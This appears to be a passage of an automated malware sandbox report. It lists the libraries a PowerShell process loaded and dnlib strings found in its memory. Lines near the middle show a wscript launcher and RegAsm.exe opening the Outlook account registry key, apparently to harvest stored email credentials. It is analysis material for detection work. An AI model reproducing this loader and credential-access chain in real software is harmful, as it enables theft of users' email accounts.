                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.3263198460.00000000025AD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3352588129.0000000007C01000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ws\System.Core.pdb source: powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: tem.Core.pdb_ source: powershell.exe, 0000000A.00000002.3373832812.0000000006C38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ore.pdb_ source: powershell.exe, 0000000A.00000002.3373832812.0000000006C38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000E.00000002.3372267954.0000000008D00000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
